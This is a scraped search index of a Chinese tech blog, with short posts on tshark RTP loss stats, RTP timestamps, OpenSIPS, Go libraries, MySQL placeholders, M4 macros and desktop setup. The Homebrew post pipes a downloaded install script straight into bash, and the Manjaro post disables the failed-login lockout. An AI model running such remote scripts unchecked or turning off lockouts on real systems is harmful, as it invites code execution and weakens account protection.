tcpdump的故事"},{"content":"wireshark安装之后,tshark也会自动安装。tshark也可以单独安装。\n如果我们想快速的分析语音刘相关的问题,可以参考下面的一个命令。\n语音卡顿,常见的原因就是网络丢包,tshark在命令行中快速输出语音流的丢包率。\n如下所示,rtp的丢包率分别是2.5%和4.6%。\ntshark -r abc.pcap -q -z rtp,streams ========================= RTP Streams ======================== Start time End time Src IP addr Port Dest IP addr Port SSRC Payload Pkts Lost Min Delta(ms) Mean Delta(ms) Max Delta(ms) Min Jitter(ms) Mean Jitter(ms) Max Jitter(ms) Problems? 2.666034 60.446026 192.168.69.12 18892 192.168.68.111 26772 0x76EFFF66 g711A 2807 72 (2.5%) 0.011 20.592 120.002 0.001 0.074 2.430 X 0.548952 60.467686 192.168.68.111 26772 192.168.69.12 18892 0xA655E7B6 g711A 2215 106 (4.6%) 9.520 21.202 219.777 0.055 6.781 256.014 X ============================================================== tshark的-z参数 -z参数可以用来提取各种统计数据。\n-z Get TShark to collect various types of statistics and display the result after finishing reading the capture file. Use the -q option if you’re reading a capture file and only want the statistics printed, not any per-packet information. Statistics are calculated independently of the normal per-packet output, unaffected by the main display filter. However, most have their own optional filter parameter, and only packets that match that filter (and any capture filter or read filter) will be used in the calculations. Note that the -z proto option is different - it doesn’t cause statistics to be gathered and printed when the capture is complete, it modifies the regular packet summary output to include the values of fields specified with the option. Therefore you must not use the -q option, as that option would suppress the printing of the regular packet summary output, and must also not use the -V option, as that would cause packet detail information rather than packet summary information to be printed. tshark -z help可以打\ntshark -z help 常用的\n-z conv,tcp-z conv,ip-z conv,udp-z endpoints,type[,filter]-z expert,sip-z sip,stat-z ip_hosts,tree-z rtp,streams\n","permalink":"https://wdd.js.org/opensips/tools/tshark/","summary":"wireshark安装之后,tshark也会自动安装。tshark也可以单独安装。\n如果我们想快速的分析语音刘相关的问题,可以参考下面的一个命令。\n语音卡顿,常见的原因就是网络丢包,tshark在命令行中快速输出语音流的丢包率。\n如下所示,rtp的丢包率分别是2.5%和4.6%。\ntshark -r abc.pcap -q -z rtp,streams ========================= RTP Streams ======================== Start time End time Src IP addr Port Dest IP addr Port SSRC Payload Pkts Lost Min Delta(ms) Mean Delta(ms) Max Delta(ms) Min Jitter(ms) Mean Jitter(ms) Max Jitter(ms) Problems? 2.666034 60.446026 192.168.69.12 18892 192.168.68.111 26772 0x76EFFF66 g711A 2807 72 (2.5%) 0.011 20.592 120.002 0.001 0.074 2.430 X 0.548952 60.467686 192.168.68.111 26772 192.168.69.12 18892 0xA655E7B6 g711A 2215 106 (4.","title":"tshark 快速分析语音流问题"},{"content":"对于浏览器,我有以下几个需求\n能在所有平台上运行,包括mac, windows, linux, ios, 安卓 能够非常方便的同步浏览器之间的数据,例如书签之类的 能够很方便的安装扩展程序,无需翻墙 按照这些条件,只有Firefox能否满足。\n当然安装使用Firefox的时候,也出现了几小插曲。\nmacos 我在ios上登录Firefox上的账户,在MacOS的Firefox却无法登陆,查了才发现,原来FireFox的账号分为国内版和国际版,两者之间数据不通,所以在macos上,也要登陆国内版本,就是带有火狐通行证的登陆页面。\n需要在同步页面点击切换至本地服务。\nlinux/manjaro manjaro上安装的firefox居然没有切换本地服务这个选项,后来发现这个浏览器上没有附加组件管理器所以需要去 http://mozilla.com.cn/moz-addon.html, 安装好附加组件管理器,登陆的时候,应该就可以跳转到带有火狐通行证的登陆页面了。\n","permalink":"https://wdd.js.org/posts/2020/02/yva0h1/","summary":"对于浏览器,我有以下几个需求\n能在所有平台上运行,包括mac, windows, linux, ios, 安卓 能够非常方便的同步浏览器之间的数据,例如书签之类的 能够很方便的安装扩展程序,无需翻墙 按照这些条件,只有Firefox能否满足。\n当然安装使用Firefox的时候,也出现了几小插曲。\nmacos 我在ios上登录Firefox上的账户,在MacOS的Firefox却无法登陆,查了才发现,原来FireFox的账号分为国内版和国际版,两者之间数据不通,所以在macos上,也要登陆国内版本,就是带有火狐通行证的登陆页面。\n需要在同步页面点击切换至本地服务。\nlinux/manjaro manjaro上安装的firefox居然没有切换本地服务这个选项,后来发现这个浏览器上没有附加组件管理器所以需要去 http://mozilla.com.cn/moz-addon.html, 安装好附加组件管理器,登陆的时候,应该就可以跳转到带有火狐通行证的登陆页面了。","title":"为什么我又开始使用Firefox浏览器"},{"content":"1. datamash https://www.gnu.org/software/datamash/ 能够方便的计算数据的平均值,最大值,最小值等数据。\n2. textsql https://github.com/dinedal/textql 能够方便的对csv文件做sql查询\n3. graph-cli https://github.com/mcastorina/graph-cli 能够直接读取csv文件,然后绘图。\n","permalink":"https://wdd.js.org/posts/2022/02/","summary":"1. datamash https://www.gnu.org/software/datamash/ 能够方便的计算数据的平均值,最大值,最小值等数据。\n2. textsql https://github.com/dinedal/textql 能够方便的对csv文件做sql查询\n3. graph-cli https://github.com/mcastorina/graph-cli 能够直接读取csv文件,然后绘图。","title":"有意思的命令行工具"},{"content":"OpenSIPS需要用数据库持久化数据,常用的是mysql。\n可以参考这个官方的教程去初始化数据库的数据 https://www.opensips.org/Documentation/Install-DBDeployment-2-4\n如果你想自己创建语句,也是可以的,实际上建表语句在OpenSIPS安装之后,已经被保存在你的电脑上。\n一般位于 /usr/local/share/opensips/mysql 目录中\ncd /usr/local/share/opensips/mysql ls acc-create.sql call_center-create.sql dispatcher-create.sql group-create.sql rls-create.sql uri_db-create.sql alias_db-create.sql carrierroute-create.sql domain-create.sql imc-create.sql rtpengine-create.sql userblacklist-create.sql auth_db-create.sql closeddial-create.sql domainpolicy-create.sql load_balancer-create.sql rtpproxy-create.sql usrloc-create.sql avpops-create.sql clusterer-create.sql drouting-create.sql msilo-create.sql siptrace-create.sql b2b-create.sql cpl-create.sql emergency-create.sql permissions-create.sql speeddial-create.sql b2b_sca-create.sql dialog-create.sql fraud_detection-create.sql presence-create.sql standard-create.sql cachedb_sql-create.sql dialplan-create.sql freeswitch_scripting-create.sql registrant-create.sql tls_mgm-create.sql ","permalink":"https://wdd.js.org/opensips/ch5/sql-table/","summary":"OpenSIPS需要用数据库持久化数据,常用的是mysql。\n可以参考这个官方的教程去初始化数据库的数据 https://www.opensips.org/Documentation/Install-DBDeployment-2-4\n如果你想自己创建语句,也是可以的,实际上建表语句在OpenSIPS安装之后,已经被保存在你的电脑上。\n一般位于 /usr/local/share/opensips/mysql 目录中\ncd /usr/local/share/opensips/mysql ls acc-create.sql call_center-create.sql dispatcher-create.sql group-create.sql rls-create.sql uri_db-create.sql alias_db-create.sql carrierroute-create.sql domain-create.sql imc-create.sql rtpengine-create.sql userblacklist-create.sql auth_db-create.sql closeddial-create.sql domainpolicy-create.sql load_balancer-create.sql rtpproxy-create.sql usrloc-create.sql avpops-create.sql clusterer-create.sql drouting-create.sql msilo-create.sql siptrace-create.sql b2b-create.sql cpl-create.sql emergency-create.sql permissions-create.sql speeddial-create.sql b2b_sca-create.sql dialog-create.sql fraud_detection-create.sql presence-create.sql standard-create.sql cachedb_sql-create.sql dialplan-create.sql freeswitch_scripting-create.sql registrant-create.sql tls_mgm-create.sql ","title":"mysql建表语句"},{"content":"1. 安装vivaldi浏览器 pamac install vivaldi 参考:https://wiki.manjaro.org/index.php/Vivaldi_Browser\n2. 关闭三次密码错误锁定 修改/etc/security/faillock.conf, 将其中的deny取消注释,并改为0,然后注销。重新登录。\ndeny = 0 3. 禁用大写锁定键 在输入设备中,选择键盘-》高级》 Caps Lock行为, 选中Caps Lock被禁用, 然后应用。\n","permalink":"https://wdd.js.org/posts/2022/01/","summary":"1. 安装vivaldi浏览器 pamac install vivaldi 参考:https://wiki.manjaro.org/index.php/Vivaldi_Browser\n2. 关闭三次密码错误锁定 修改/etc/security/faillock.conf, 将其中的deny取消注释,并改为0,然后注销。重新登录。\ndeny = 0 3. 禁用大写锁定键 在输入设备中,选择键盘-》高级》 Caps Lock行为, 选中Caps Lock被禁用, 然后应用。","title":"manjaro kde 之旅"},{"content":"最近遇到一些和媒体流相关的问题,使用wireshark分析之后,总算有些眉目。然而我深感对RTP协议的理解,还是趋于表面。所以我决定,深入的学习一下RTP协议。\n和rtp相关的协议有两个rfc, 分别是\n1996的的 RFC 1889 2003年的 RFC 3550 RFC 3550是对RFC 1889的稍微改进,然而大体上是没什么改变的。所以我们可以直接看RFC 3550。\nRTP 底层用的是UDP协议 RTP 的使用场景是传输实时数据,例如语音,视频,模拟数据等等 RTP 并不保证QoS Synchronization source (SSRC): The source of a stream of RTP packets, identified by a 32-bit numeric SSRC identifier carried in the RTP header so as not to be dependent upon the network address. All packets from a synchronization source form part of the same timing and sequence number space, so a receiver groups packets by synchronization source for playback. Examples of synchronization sources include the sender of a stream of packets derived from a signal source such as a microphone or a camera, or an RTP mixer (see below). A synchronization source may change its data format, e.g., audio encoding, over time. The SSRC identifier is a randomly chosen value meant to be globally unique within a particular RTP session (see Section 8). A participant need not use the same SSRC identifier for all the RTP sessions in a multimedia session; the binding of the SSRC identifiers is provided through RTCP (see Section 6.5.1). If a participant generates multiple streams in one RTP session, for example from separate video cameras, each MUST be identified as a different SSRC.\nThe first twelve octets are present in every RTP packet, while the list of CSRC identifiers is present only when inserted by a mixer. The fields have the following meaning:\nversion (V): 2 bits This field identifies the version of RTP. The version defined by this specification is two (2). (The value 1 is used by the first draft version of RTP and the value 0 is used by the protocol initially implemented in the \u0026ldquo;vat\u0026rdquo; audio tool.)\npadding (P): 1 bit If the padding bit is set, the packet contains one or more additional padding octets at the end which are not part of the payload. The last octet of the padding contains a count of how many padding octets should be ignored, including itself. Padding may be needed by some encryption algorithms with fixed block sizes or for carrying several RTP packets in a lower-layer protocol data unit.\nextension (X): 1 bit If the extension bit is set, the fixed header MUST be followed by exactly one header extension, with a format defined in Section 5.3.1.\nCSRC count (CC): 4 bits The CSRC count contains the number of CSRC identifiers that follow the fixed header.\nmarker (M): 1 bit The interpretation of the marker is defined by a profile. It is intended to allow significant events such as frame boundaries to be marked in the packet stream. A profile MAY define additional marker bits or specify that there is no marker bit by changing the number of bits in the payload type field (see Section 5.3).\npayload type (PT): 7 bits This field identifies the format of the RTP payload and determines its interpretation by the application. A profile MAY specify a default static mapping of payload type codes to payload formats. Additional payload type codes MAY be defined dynamically through non-RTP means (see Section 3). A set of default mappings for audio and video is specified in the companion RFC 3551 [1]. An RTP source MAY change the payload type during a session, but this field SHOULD NOT be used for multiplexing separate media streams (see Section 5.2). A receiver MUST ignore packets with payload types that it does not understand.\nsequence number: 16 bits The sequence number increments by one for each RTP data packet sent, and may be used by the receiver to detect packet loss and to restore packet sequence. The initial value of the sequence number SHOULD be random (unpredictable) to make known-plaintext attacks on encryption more difficult, even if the source itself does not encrypt according to the method in Section 9.1, because the packets may flow through a translator that does. Techniques for choosing unpredictable numbers are discussed in [17].\ntimestamp: 32 bits 最重要的就是这个字段,需要认证理解。\ntimestamp的初始值是一个随机值,而不是linux时间戳 timestamp反应的是rtp采样数据的一个字节的采样时刻 对于相同的rtp流来说,timestamp总是线性按照固定的长度增长,一般是160。采样频率一般是8000hz, 也就是说1秒会有8000个样本数据,每个样本占用1个字节。发送方一般每隔20毫秒发送一个20毫秒内的所有采样数据。那么一秒钟发送方会发送1000/20=50个RTP包,50个数据包发送8000个采样数据,平均每隔数据包携带8000/50=160个字节的数据。所以timestamp的增量一般是160, 在wireshark上抓包,可以看到rtc流的time字段是按照160的步长在增加。 然后我们分析单个的RTP流,从IP层可以看出UDP payload是172个字节,实际上就是rtp的采样数据160 + RTP的固定的12字节的头部 但是也有时候, timestamp也并不是总是按照固定的步长再增长,例如下图,3166508092的下一个包的Time字段突然变成1307389520了。这种情况比较特殊,一般是多个不同SSRC的语音流再经过同一个SBC时,SSRC被修改成相同的值,但是timestamp字段是原样保留的。导致发出的RTP流timestamp字段不再连续。在wireshark的流分析上,也能看出出现了不正常的timestamp。这种不正常的timestamp对于某些sipua来说,它可能会忽略不连续的所有后续的RTP包,进而导致无法放音的问题。我就层遇到过fs类似的问题,一个解决方案是升级fs, 另一个方案是试下 fs的rtp_rewrite_timestamps通道变量为true。https://freeswitch.org/confluence/display/FREESWITCH/rtp_rewrite_timestamps The timestamp reflects the sampling instant of the first octet in the RTP data packet. The sampling instant MUST be derived from a clock that increments monotonically and linearly in time to allow synchronization and jitter calculations (see Section 6.4.1). The resolution of the clock MUST be sufficient for the desired synchronization accuracy and for measuring packet arrival jitter (one tick per video frame is typically not sufficient). The clock frequency is dependent on the format of data carried as payload and is specified statically in the profile or payload format specification that defines the format, or MAY be specified dynamically for payload formats defined through non-RTP means. If RTP packets are generated periodically, the nominal sampling instant as determined from the sampling clock is to be used, not a reading of the system clock. As an example, for fixed-rate audio the timestamp clock would likely increment by one for each sampling period. If an audio application reads blocks covering 160 sampling periods from the input device, the timestamp would be increased by 160 for each such block, regardless of whether the block is transmitted in a packet or dropped as silent. The initial value of the timestamp SHOULD be random, as for the sequence number. Several consecutive RTP packets will have equal timestamps if they are (logically) generated at once, e.g., belong to the same video frame. Consecutive RTP packets MAY contain timestamps that are not monotonic if the data is not transmitted in the order it was sampled, as in the case of MPEG interpolated video frames. (The sequence numbers of the packets as transmitted will still be monotonic.) RTP timestamps from different media streams may advance at different rates and usually have independent, random offsets. Therefore, although these timestamps are sufficient to reconstruct the timing of a single stream, directly comparing RTP timestamps from different media is not effective for synchronization. Instead, for each medium the RTP timestamp is related to the sampling instant by pairing it with a timestamp from a reference clock (wallclock) that represents the time when the data corresponding to the RTP timestamp was sampled. The reference clock is shared by all media to be synchronized. The timestamp pairs are not transmitted in every data packet, but at a lower rate in RTCP SR packets as described in Section 6.4. The sampling instant is chosen as the point of reference for the RTP timestamp because it is known to the transmitting endpoint and has a common definition for all media, independent of encoding delays or other processing. The purpose is to allow synchronized presentation of all media sampled at the same time. Applications transmitting stored data rather than data sampled in real time typically use a virtual presentation timeline derived from wallclock time to determine when the next frame or other unit of each medium in the stored data should be presented. In this case, the RTP timestamp would reflect the presentation time for each unit. That is, the RTP timestamp for each unit would be related to the wallclock time at which the unit becomes current on the virtual presentation timeline. Actual presentation occurs some time later as determined by the receiver. An example describing live audio narration of prerecorded video illustrates the significance of choosing the sampling instant as the reference point. In this scenario, the video would be presented locally for the narrator to view and would be simultaneously transmitted using RTP. The \u0026ldquo;sampling instant\u0026rdquo; of a video frame transmitted in RTP would be established by referencing\nits timestamp to the wallclock time when that video frame was presented to the narrator. The sampling instant for the audio RTP packets containing the narrator\u0026rsquo;s speech would be established by referencing the same wallclock time when the audio was sampled. The audio and video may even be transmitted by different hosts if the reference clocks on the two hosts are synchronized by some means such as NTP. A receiver can then synchronize presentation of the audio and video packets by relating their RTP timestamps using the timestamp pairs in RTCP SR packets.\nSSRC: 32 bits The SSRC field identifies the synchronization source. This identifier SHOULD be chosen randomly, with the intent that no two synchronization sources within the same RTP session will have the same SSRC identifier. An example algorithm for generating a random identifier is presented in Appendix A.6. Although the probability of multiple sources choosing the same identifier is low, all RTP implementations must be prepared to detect and resolve collisions. Section 8 describes the probability of collision along with a mechanism for resolving collisions and detecting RTP-level forwarding loops based on the uniqueness of the SSRC identifier. If a source changes its source transport address, it must also choose a new SSRC identifier to avoid being interpreted as a looped source (see Section 8.2).\nCSRC list: 0 to 15 items, 32 bits each The CSRC list identifies the contributing sources for the payload contained in this packet. The number of identifiers is given by the CC field. If there are more than 15 contributing sources, only 15 can be identified. CSRC identifiers are inserted by mixers (see Section 7.1), using the SSRC identifiers of contributing sources. For example, for audio packets the SSRC identifiers of all sources that were mixed together to create a packet are listed, allowing correct talker indication at the receiver.\n参考文档 http://www.rfcreader.com/#rfc3550 http://www.rfcreader.com/#rfc1889 ","permalink":"https://wdd.js.org/opensips/ch4/rtp-timestamp/","summary":"最近遇到一些和媒体流相关的问题,使用wireshark分析之后,总算有些眉目。然而我深感对RTP协议的理解,还是趋于表面。所以我决定,深入的学习一下RTP协议。\n和rtp相关的协议有两个rfc, 分别是\n1996的的 RFC 1889 2003年的 RFC 3550 RFC 3550是对RFC 1889的稍微改进,然而大体上是没什么改变的。所以我们可以直接看RFC 3550。\nRTP 底层用的是UDP协议 RTP 的使用场景是传输实时数据,例如语音,视频,模拟数据等等 RTP 并不保证QoS Synchronization source (SSRC): The source of a stream of RTP packets, identified by a 32-bit numeric SSRC identifier carried in the RTP header so as not to be dependent upon the network address. All packets from a synchronization source form part of the same timing and sequence number space, so a receiver groups packets by synchronization source for playback.","title":"RTP 不连续的timestamp和SSRC"},{"content":"要求 [必须] 能够保存密码, 或者用私钥登录 [必须] 能够支持ftp/sftp [必须] 开源免费 [必须] 界面漂亮,支持中文字符 [可选] 支持同步ssh配置 [必须] 支持跨平台 Tabby A terminal for a more modern age (formerly Terminus) https://github.com/Eugeny/tabby https://tabby.sh/ 25.7k Star 基于electron, 主要开发语言typescript\nElecterm Terminal/ssh/sftp client(linux, mac, win) https://github.com/electerm/electerm https://electerm.github.io/electerm/ 4.8k star 基于electron, 主要开发语言javascript\nWindTerm A Quicker and better SSH/Telnet/Serial/Shell/Sftp client for DevOps.\nhttps://github.com/kingToolbox/WindTerm 2.6K star 主要开发语言: C\n","permalink":"https://wdd.js.org/posts/2021/12/","summary":"要求 [必须] 能够保存密码, 或者用私钥登录 [必须] 能够支持ftp/sftp [必须] 开源免费 [必须] 界面漂亮,支持中文字符 [可选] 支持同步ssh配置 [必须] 支持跨平台 Tabby A terminal for a more modern age (formerly Terminus) https://github.com/Eugeny/tabby https://tabby.sh/ 25.7k Star 基于electron, 主要开发语言typescript\nElecterm Terminal/ssh/sftp client(linux, mac, win) https://github.com/electerm/electerm https://electerm.github.io/electerm/ 4.8k star 基于electron, 主要开发语言javascript\nWindTerm A Quicker and better SSH/Telnet/Serial/Shell/Sftp client for DevOps.\nhttps://github.com/kingToolbox/WindTerm 2.6K star 主要开发语言: C","title":"开源免费的ssh终端工具"},{"content":"11月2号,我的主力开发工具macbook开始退役。\n我换了nuc11 i7, 安装了国产的deepin(深度)操作系统。总体体验蛮好的,只是apt-get的软件包里,太多都是很老的包。所以我想到以前用mac的包管理工具homebrew, 据说它不仅仅可以在mac上工作,主流的linux也是能够使用的。\nhomebrew的介绍是:The Missing Package Manager for macOS (or Linux)。也就是说brew完全可以在linux上运行。\n安装方式也很简单:\n/bin/bash -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\u0026#34; 上面的shell执行之后,brew就安装成功了。\n和mac不同的是,linux homebrew的安装包的可执行命令的目录是:/home/linuxbrew/.linuxbrew/bin, 所以需要把它加入到PATH中,安装的软件才能正确执行。\n参考 https://brew.sh/ ","permalink":"https://wdd.js.org/posts/2021/11/","summary":"11月2号,我的主力开发工具macbook开始退役。\n我换了nuc11 i7, 安装了国产的deepin(深度)操作系统。总体体验蛮好的,只是apt-get的软件包里,太多都是很老的包。所以我想到以前用mac的包管理工具homebrew, 据说它不仅仅可以在mac上工作,主流的linux也是能够使用的。\nhomebrew的介绍是:The Missing Package Manager for macOS (or Linux)。也就是说brew完全可以在linux上运行。\n安装方式也很简单:\n/bin/bash -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\u0026#34; 上面的shell执行之后,brew就安装成功了。\n和mac不同的是,linux homebrew的安装包的可执行命令的目录是:/home/linuxbrew/.linuxbrew/bin, 所以需要把它加入到PATH中,安装的软件才能正确执行。\n参考 https://brew.sh/ ","title":"使用brew作为deepin的包管理工具"},{"content":"web框架 https://github.com/gofiber/fiber http client https://github.com/go-resty/resty mock https://github.com/jarcoal/httpmock 项目结构 https://github.com/golang-standards/project-layout 环境变量操作 https://github.com/caarlos0/env https://github.com/kelseyhightower/envconfig 测试框架 https://github.com/stretchr/testify 日志框架 https://github.com/uber-go/zap html解析 https://github.com/PuerkitoBio/goquery cli工具 https://github.com/urfave/cli 各种库大全集 https://github.com/avelino/awesome-go 终端颜色 https://github.com/fatih/color 剪贴板 https://github.com/atotto/clipboard 数据库驱动 https://github.com/go-sql-driver/mysql 热重载 https://github.com/cosmtrek/air 时间处理 https://github.com/golang-module/carbon 错误封装 https://github.com/pkg/errors 结构体转二进制 https://github.com/lunixbochs/struc VIM智能补全提示 需要安装coc-go, 还有vim-go\n","permalink":"https://wdd.js.org/golang/my-start-repo/","summary":"web框架 https://github.com/gofiber/fiber http client https://github.com/go-resty/resty mock https://github.com/jarcoal/httpmock 项目结构 https://github.com/golang-standards/project-layout 环境变量操作 https://github.com/caarlos0/env https://github.com/kelseyhightower/envconfig 测试框架 https://github.com/stretchr/testify 日志框架 https://github.com/uber-go/zap html解析 https://github.com/PuerkitoBio/goquery cli工具 https://github.com/urfave/cli 各种库大全集 https://github.com/avelino/awesome-go 终端颜色 https://github.com/fatih/color 剪贴板 https://github.com/atotto/clipboard 数据库驱动 https://github.com/go-sql-driver/mysql 热重载 https://github.com/cosmtrek/air 时间处理 https://github.com/golang-module/carbon 错误封装 https://github.com/pkg/errors 结构体转二进制 https://github.com/lunixbochs/struc VIM智能补全提示 需要安装coc-go, 还有vim-go","title":"我常用的第三方库"},{"content":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","permalink":"https://wdd.js.org/golang/mysql-placeholder/","summary":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","title":"mysql placeholder的错误使用方式"},{"content":"为什么是印象笔记 作为一个笔记,或者说文本编辑器,一个最基本的要求,就是能按照用户的按键输入。而不是用户输入了A,然后在页面上看到了B。\n但是对于印象笔记来说,我已经遇到过好多次因为输入问题,几乎想要放弃印象笔记。但是就目前来讲,仍然没有好用的替代品。\n对于笔记软件来说,我有以下的几个最为基础的要求。\n必须跨平台。能够有桌面端App和IOS或者安卓的APP 必须同步要快。 必须要能有网页剪藏的插件 必须要少折腾,用户体验好。我的目的是记录内容,而不是折腾各种同步或者网络配置。 必须是付费的产品。免费的产品,是没有可持续发展潜力的。当然,付费需要在接受范围之内。 必须足够稳定 用户界面,体验必须足够好 必须要离线使用 就目前来说,能满足以上几个要求的,屈指可数。\n印象笔记虽然有恶心的广告推送(即使会员也有广告),但是一般在非特殊的日子,广告不回一直存在的。\n印象笔记不太智能的替换 把英文单引号替换成中文单引号 把两个\u0026ndash;天换成一个中文破折号 以上两个问题,在粘贴代码的时候,是致命的问题。我本来粘贴的是两个\u0026ndash;,粘贴到印象笔记里居然变成一个中文破折号,那么后期在复制出来用的,必然出现问题。\n我问了官方的客服,官方的客户也不知道怎么解决。\n后来我自己在网上搜索,发现了解决问题的方法。\n以上所有的关于替换的问题,都是和编辑器的替换设置有关。\n打开一个笔记,然后点击右键\n选择替换,可以看到里面有智能引号,只能破折号,智能连接,文本替换,建议把这几个都取消勾选\n还有一个可能性,就是在**编辑-\u0026gt;拼写和语法-\u0026gt;自动拼写纠正,**这个要关闭。\n","permalink":"https://wdd.js.org/posts/2021/10/","summary":"为什么是印象笔记 作为一个笔记,或者说文本编辑器,一个最基本的要求,就是能按照用户的按键输入。而不是用户输入了A,然后在页面上看到了B。\n但是对于印象笔记来说,我已经遇到过好多次因为输入问题,几乎想要放弃印象笔记。但是就目前来讲,仍然没有好用的替代品。\n对于笔记软件来说,我有以下的几个最为基础的要求。\n必须跨平台。能够有桌面端App和IOS或者安卓的APP 必须同步要快。 必须要能有网页剪藏的插件 必须要少折腾,用户体验好。我的目的是记录内容,而不是折腾各种同步或者网络配置。 必须是付费的产品。免费的产品,是没有可持续发展潜力的。当然,付费需要在接受范围之内。 必须足够稳定 用户界面,体验必须足够好 必须要离线使用 就目前来说,能满足以上几个要求的,屈指可数。\n印象笔记虽然有恶心的广告推送(即使会员也有广告),但是一般在非特殊的日子,广告不回一直存在的。\n印象笔记不太智能的替换 把英文单引号替换成中文单引号 把两个\u0026ndash;天换成一个中文破折号 以上两个问题,在粘贴代码的时候,是致命的问题。我本来粘贴的是两个\u0026ndash;,粘贴到印象笔记里居然变成一个中文破折号,那么后期在复制出来用的,必然出现问题。\n我问了官方的客服,官方的客户也不知道怎么解决。\n后来我自己在网上搜索,发现了解决问题的方法。\n以上所有的关于替换的问题,都是和编辑器的替换设置有关。\n打开一个笔记,然后点击右键\n选择替换,可以看到里面有智能引号,只能破折号,智能连接,文本替换,建议把这几个都取消勾选\n还有一个可能性,就是在**编辑-\u0026gt;拼写和语法-\u0026gt;自动拼写纠正,**这个要关闭。","title":"印象笔记不太智能的智能替换"},{"content":"avp_db_query是用来做数据库查询的,如果查到某列的值是NULL, 那么对应到脚本里应该如何比较呢?\n可以用avp的值与\u0026quot;\u0026quot;, 进行比较\nif ($avp(status) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) 参考 https://stackoverflow.com/questions/52675803/opensips-avp-db-query-cant-compare-null-value ","permalink":"https://wdd.js.org/opensips/ch5/avp-db-query/","summary":"avp_db_query是用来做数据库查询的,如果查到某列的值是NULL, 那么对应到脚本里应该如何比较呢?\n可以用avp的值与\u0026quot;\u0026quot;, 进行比较\nif ($avp(status) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) 参考 https://stackoverflow.com/questions/52675803/opensips-avp-db-query-cant-compare-null-value ","title":"avp_db_query数值null值比较"},{"content":"文本处理的难点 有一个文本文件,内容如下,摘抄其中两行内容如下,里面有两个配置db_addr, local_ip这两个配置,需要在不同环境要修改的。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.4 但是哪些地方要修改呢?为了提醒后续的维护者,我们给要修改的地方加个备注吧。\ndb_addr=1.2.3.4:3306 # 这里要修改 local_ip=192.168.2.4 # 这里要修改 .... ... if len(a) = 1024 { # 这里要修改1024 ... } ... 用sed替换? 让别人一个一个地方去修改,也太麻烦了,有没有可能用脚本去处理呢?例如我们用DB_ADDR和LOCAL_IP这种字符串作为占位符,然后我们就可以用sed之类的命令去做替换了。\ndb_addr=DB_ADDR local_ip=LOCAL_IP sed -i \u0026#39;s/DB_ADDR/1.2.3.4:3306/g;s/LOCAL_IP/192.168.0.1/g\u0026#39; 1.cfg 这样做是有点方便了,但是也有以下几个问题\n如果定义的占位符太多,sed会变得越来越长 如果某些占位符里本身就含有/或者一些特殊含义的字符,就需要做特殊处理了 用M4吧,专业的人做专业的事情 apt-get install m4 通过命令行定义宏 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... M4可以使用-D来定义宏和宏对应的值,默认输出到标准输出,我们可以用\u0026gt;将输出写到文件中\nm4 -D DB_ADDR=1.2.3.4:3306 -D LOCAL_IP=192.168.2.2 -D MAX_LEN=2048 1.m4 db_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 用define语句定义宏 用define()语句来定义宏 用`\u0026lsquo;来作为字符串引用,避免被展开 define(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;) define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;) define(`MAX_LEN\u0026#39;, `2048\u0026#39;) db_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... 执行命令m4 1.m4, 可以看到宏展开,但是有很多空行。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ...% 用dnl避免产生空行 在define语句的末尾,加上dnl\ndefine(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;)dnl define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;)dnl define(`MAX_LEN\u0026#39;, `2048\u0026#39;)dnl db_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... 执行m4 1.m4 可以看到,空行没了\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 抽离出宏配置文件 将1.m4分成两个文件1.m4, 1.conf\n1.conf\ndivert(-1) define(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;) define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;) define(`MAX_LEN\u0026#39;, `2048\u0026#39;) divert(0) 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN 